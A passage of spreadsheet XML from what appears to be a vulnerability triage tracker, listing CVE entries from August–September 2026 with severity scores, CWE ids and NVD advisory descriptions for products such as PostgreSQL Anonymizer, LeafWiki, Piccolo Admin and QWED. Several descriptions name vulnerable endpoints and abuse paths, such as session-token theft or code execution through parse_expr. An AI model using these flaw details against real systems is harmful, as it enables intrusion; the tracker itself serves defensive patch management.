          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14359</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr"/>
      <c r="Q158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="S158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19633</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21094</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr"/>
      <c r="Q159" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in wpa_supplicant prior to SMR Sep-2026 Release 1 allows adjacent attackers to write out-of-bounds memory.</t>
        </is>
      </c>
      <c r="S159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21094</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-31936</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr"/>
      <c r="Q160" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, users can access to unauthorized object information through the search operation. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-31936</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33240</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr"/>
      <c r="Q161" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there was a Reflected Cross-Site Scripting (XSS) vulnerability in the foreign key search criteria API. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33240</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41870</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr"/>
      <c r="Q162" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-862, CWE-913, CWE-94</t>
        </is>
      </c>
      <c r="R162"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S162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41870</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48050</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr"/>
      <c r="Q163" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306, CWE-400</t>
        </is>
      </c>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Versions prior to 26.06.1 register Go's `net/http/pprof` handlers at `/debug/pprof/*` via `app.Use(pprof.New())` in `internal/api/server.go`, and `/debug/pprof` is added to `PublicPrefixes` in `cmd/arc/main.go`. The auth middleware short-circuits before the token check on prefix match, so the endpoints are reachable without any authentication. Version 26.06.1 contains a patch. Some workarounds are available. Block `/debug/pprof*` at a reverse proxy / load balancer in front of Arc, restrict Arc's API port to known-trusted networks via firewall rules, and/or patch the running build: comment out `app.Use(pprof.New())` in `internal/api/server.go` and rebuild.</t>
        </is>
      </c>
      <c r="S163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48050</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49050</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>apache:dolphinscheduler</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr"/>
      <c r="Q164" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>General user can mint admin access tokens via /access-tokens
This issue affects Apache DolphinScheduler: before 3.4.2.
Users are recommended to upgrade to version 3.4.2, which fixes the issue.</t>
        </is>
      </c>
      <c r="S164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49050</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53527</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr"/>
      <c r="Q165" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.1.0 through 0.10.0 have a privilege escalation vulnerability in the user update API. An authenticated user could update their own account role and escalate privileges from a regular user, such as `viewer`, to `admin`. Exploitation requires a valid authenticated LeafWiki user account. Instances without public registration and with only trusted users are at lower practical risk. Users should update to version 0.10.1 or greater. Until a patch is available, operators should restrict account creation and ensure that only trusted users have accounts on affected LeafWiki instances. If possible, access to the user update API should be restricted to trusted users or administrators only.</t>
        </is>
      </c>
      <c r="S165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53527</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53528</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr"/>
      <c r="Q166" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.3.0 through 0.10.0 have a path traversal vulnerability in LeafWiki’s asset rename functionality. An authenticated user with editor permissions could move files that are accessible to the LeafWiki server process into a page’s asset directory. This could allow sensitive local files, such as the application database, to become downloadable as page assets. Users should update to version 0.10.1 or greater. As an additional mitigation, operators should ensure that the LeafWiki process runs with the least privileges necessary and does not have filesystem access to sensitive files outside the application’s required directories. Until a patch is applied, operators may reduce risk by restricting editor access to trusted users only and by limiting the filesystem permissions of the LeafWiki process.</t>
        </is>
      </c>
      <c r="S166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53528</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53706</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr"/>
      <c r="Q167" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the prevail eBPF verifier accepts ALU32 ADD and SUB instructions that operate on pointer-typed registers without checking the is64 flag. Because ALU32 arithmetic zero-extends the 32-bit result, the upper half of any pointer is silently destroyed at runtime, yet prevail marks the program as verified safe. Any caller that can submit an eBPF program for verification — including unprivileged users on kernels that permit BPF program loading — can produce a program that passes verification but faults or misbehaves at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53706</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54721</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>Silverstripe UserForms provides a visual form builder for the Silverstripe CMS. From 6.0.0 until 6.4.9, 7.0.7, and 7.1.1, the userform email recipient subject field in the CMS accepts a specially crafted payload that can be interpreted as executable server-side code. An authenticated CMS user with permission to configure a UserForms email recipient can use the subject field to run arbitrary code on the server, compromising confidentiality, integrity, and availability. This issue is fixed in versions 6.4.9, 7.0.7, and 7.1.1.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54721</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55485</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>Piccolo Admin is an admin interface and content management system for Python, built on top of Piccolo. Prior to 1.14.0, piccolo_admin/endpoints.py uses superuser_validators to block PUT, PATCH, DELETE, and POST requests by non-superusers but permits GET requests to configured user and session tables, while piccolo_api/session_auth/tables.py exposes SessionsBase.token because the token column is not secret. In deployments that add the Sessions and User tables to create_admin, a non-superuser administrator can call GET /api/tables/sessions/, obtain another user's live session token, replay it as the Cookie id value to impersonate a superuser, and permanently set superuser to true on the attacker's own row. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55485</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55541</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, praisonai serve agents and praisonai serve unified parse --api-key but _create_agents_app() and _create_unified_app() do not install a credential check. Unauthenticated callers can reach POST /agents and POST /api/v1/agents/{id}/invoke. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55541</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55585</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>QWED is open-source AI verification infrastructure for deterministic verification of LLM outputs, tool calls, code, schemas, and agent state before production execution. Prior to 5.1.2, the qwed package passes caller-controlled math expressions directly to SymPy parse_expr() without restricted global_dict and local_dict namespaces, allowing Python eval() to resolve builtins and execute arbitrary Python code in the API server process. In src/qwed_new/api/main.py, POST /verify/math is protected by get_current_tenant but accepts any valid tenant API key, reads the expression field, applies only a cosmetic re.sub(r'(\d)(()', r'\1*\2', expression) normalization, and passes the result to parse_expr(). In src/qwed_new/core/batch.py, POST /verify/batch sends math items through batch_service.create_job(), stores item.query verbatim, and _verify_item() passes VerificationType.MATH input to parse_expr() without sanitization. The default-enabled POST /auth/signup endpoint allows anyone to create a standard tenant account, POST /auth/api-keys issues an x-api-key, and either vulnerable path can then be used to read or write files, modify data, execute operating system commands, terminate the service, and compromise other tenants in a shared deployment. This issue is fixed in version 5.1.2.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55585</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55637</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
